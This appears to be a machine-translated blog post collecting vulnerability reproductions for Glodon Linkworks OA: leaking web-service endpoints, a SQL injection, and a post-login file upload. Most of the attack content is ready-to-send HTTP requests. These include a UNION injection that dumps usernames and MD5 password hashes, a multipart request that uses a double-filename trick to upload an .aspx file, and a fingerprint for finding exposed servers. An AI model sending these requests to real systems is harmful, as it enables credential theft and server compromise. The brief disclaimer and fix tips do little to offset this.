[Recurrencia de vulnerabilidad] Colección de vulnerabilidades de Glodon OA (fuga de información + inyección SQL + carga de archivos)


declaración

No utilice las tecnologías relevantes de este artículo para realizar pruebas ilegales. Cualquier consecuencia y pérdida directa o indirecta causada por la difusión y el uso de la información o las herramientas proporcionadas en este artículo son responsabilidad del propio usuario. Todas las consecuencias adversas y El autor del artículo es irrelevante. Este artículo es sólo para fines educativos.

Hay fuga de información en Glodon OA

1. Descripción general de la vulnerabilidad

Existe una fuga de información en la oficina OA de Glodon Linkworks, un atacante puede aprovechar esta vulnerabilidad para obtener la contraseña de la cuenta para iniciar sesión en el backend, provocando otros impactos.

2. Recurrencia de vulnerabilidades

La interfaz del sistema es la siguiente. Ver todos los usuarios
Insertar descripción de la imagen aquí
con URL potencialmente peligrosas. Ver todos los proyectos. Ver la contraseña de la cuenta. Después del descifrado, inicie sesión en el sistema backend de la siguiente manera.http://url/Org/service/Service.asmx
Insertar descripción de la imagen aquí
http://url/Org/service/Service.asmx/GetAllUsersXml
Insertar descripción de la imagen aquí
http://url/Org/service/Service.asmx/GetDeptXml4GEPS
Insertar descripción de la imagen aquí
http://url/Org/service/Service.asmx/GetUserXml4GEPS
Insertar descripción de la imagen aquí

Insertar descripción de la imagen aquí

3. Sugerencias de reparación

1. Deshabilite páginas o aplicaciones que filtren información confidencial.
2. Actualice a una versión segura


Vulnerabilidad de inyección SQL OA de Glodon Linkworks office + vulnerabilidad de carga de archivos en segundo plano

1. Introducción del producto

Glodon Linkworks Office OA (Automatización de oficinas) es una solución integral de automatización de oficinas diseñada para mejorar la eficiencia del trabajo y las capacidades de colaboración dentro de una organización. Proporciona una serie de funciones y herramientas para ayudar a las empresas a gestionar y procesar tareas, procesos y documentos diarios de oficina.

2. Descripción general de la vulnerabilidad

Debido a que la GetIMDictionaryinterfaz OA de la oficina de Glodon Linkworks no filtraba eficazmente la entrada del usuario, se empalmaba en la declaración de consulta SQL, lo que provocaba una vulnerabilidad de inyección SQL en el sistema. Existe msgbroadcastuploadfile.aspxuna vulnerabilidad de carga de archivos en segundo plano en la interfaz. Después de que el atacante obtiene la información del administrador mediante inyección SQL, puede iniciar sesión y enviar un paquete de solicitud para obtener permisos del servidor.

3. Entorno de recurrencia

  • Huella digital de Intergraph: web.body="/Services/Identification/Server/"
    Insertar descripción de la imagen aquí
    visite la siguiente URL para verificar si existe la vulnerabilidad.
    http://url/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary
    Insertar descripción de la imagen aquí
    Si la situación anterior demuestra que existe la vulnerabilidad.

POC de inyección SQL
:

POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: XX.XX.XX.XX:8888
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: ASP.NET_SessionId=zldmbkj4ufv4xjlkzvudfs31; GTP_IdServer_LangID=2052; portal_default_menu_name_0=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 83

key=1' UNION ALL SELECT top 1 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER –

Insertar descripción de la imagen aquí
Utilice el descifrado MD5 e intente iniciar sesión en el servidor.

Carga de archivos en segundo plano
POC:

POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: XX.XX.XX.XX:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Cookie: 登录后的cookie
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Length: 195

------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
Content-Type: application/text
 
123456
------WebKitFormBoundaryFfJZ4PlAZBixjELj—

Insertar descripción de la imagen aquí
Insertar descripción de la imagen aquí

4. Sugerencias de reparación

1. Restrinja el acceso a las direcciones de origen. No abra el sistema a Internet a menos que sea necesario.
2. Actualiza a la última versión

Supongo que te gusta

Origin blog.csdn.net/weixin_46944519/article/details/132976132
Recomendado
Clasificación